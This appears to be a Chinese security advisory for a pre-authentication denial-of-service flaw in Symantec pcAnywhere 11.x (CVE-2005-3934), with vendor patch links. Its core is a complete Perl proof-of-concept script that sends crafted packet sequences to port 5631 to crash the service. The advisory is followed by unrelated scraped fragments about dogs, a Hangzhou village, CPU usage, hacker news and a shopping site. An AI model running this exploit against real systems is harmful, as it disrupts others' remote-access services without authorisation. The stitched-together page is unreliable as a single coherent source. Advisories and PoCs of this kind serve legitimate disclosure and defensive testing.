发布日期:2005-11-29更新日期:2006-01-17 受影响系统: Symantec pcAnywhere 11.5.1Symantec pcAnywhere 11.0.1描述: --------------------------------------------------------------------------------BUGTRAQ ID: 15646CVE(CAN) ID: CVE-2005-3934 Symantec pcAnywhere是全球最畅销的用于管理服务器和提供管理人员支持的远程控制解决方案。 pcAnywhere在处理特制消息的时候存在溢出漏洞,可能导致拒绝服务。由于溢出发生在认证之前,因此远程攻击者无需有效的凭据便可利用这个漏洞。 <*来源:Tal 链接:http://www.symantec.com/avcenter/security/Content/2005.11.29.html*> 测试 *** : -------------------------------------------------------------------------------- 警 告 以下程序( *** )可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! #!/usr/bin/perl -w# Version 2.0## PoC for# pcAnywhere Authentication Denial of Service Vulnerability# Bugtraq ID: 15646## Tested on pcanywhere v11.0 and v11.0.1## Author: David Maciejak# Date: 20060117############################### use IO::Socket; if (@ARGV<1){ die "usage: $0 pcanywhere_ip [port]";} $host=$ARGV[0];$port=$ARGV[1] || 5631; $|=1; $cl1="\x00\x00\x00\x00";$cl2="\x6F\x06\xff"; $cl3="\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00";$cl4="\x6f\x62\x01\x02\x00\x00\x00"; $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ); die "Could not create socket: $! \n" unless $sock; $sock->send($cl1);$sock->recv($buff,32768);$sock->send($cl2 x 50);$sock->recv($buff,32768);$sock->send($cl3 x 50);$sock->recv($buff,32768);$sock->send($cl4);$sock->recv($buff,32768); $str='\x06'.'\x04'.'\0xffffffc0'x300;$sock->send($str x 50);close $sock; 建议: --------------------------------------------------------------------------------厂商补丁: Symantec--------目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.symantec.com/techsupp/files/pca/index.htmlhttp://www.symantec.com/techsupp/enterprise/products/spca/files.html
由于现在生活节奏比较紧张,大部分时间都是狗狗在陪伴我们,只要主人在家,它们都会像小尾巴一样跟着你,无时无刻都是静静地陪伴着。 如果每天除了散步,就是一些小玩具,狗狗会快乐吗?狗狗天生就是活跃、精力旺...
昨天,一条新闻刷爆朋友圈——请来绿城物业当“管家”,杭州有个城中村好高大上! 这个城中村叫骆家庄,最近几年很洋气,已经不止一次上过都市快报。 所以,那边我去过好几次,但每次去,都有不...
CPU占用率高 1、解决办法;原因一:病毒木马大量的蠕虫病毒在系统内部迅速复制,造成CPU占用资源率据高不下。解决办法:用可靠的杀毒软件彻底清理系统内存和本地硬盘,并且打开系统设置软件,察看有无异常启...
【中国新闻网高新科技综合性报导】据美国《连线》杂志期刊1月17日报导,美国著名华籍硬件网络黑客黄欣国(Andrew?Huang,外号bunnie)和人合作经营应用开源系统硬件,自主生产制造出了一台笔记...
A犯法是毫无疑问的!并且因为A在其中起到一个枢纽的作用,并且是不可或缺的作用,所以判决会排在整个集团判决的第二位或第三位! 我们公司研发团队的研发人员来自腾讯众创空间团队,目前队里客服技术人员正在不断...
如果有不明白的可以质询网站的在线客服,网站服务的非常好,如有不明白的,或者不会下单的,查询订单等等问题都可以质询网站的在线客服,客服都会第一时间回复大家,人也非常的好都会耐心的回答大家的问题。来自如何...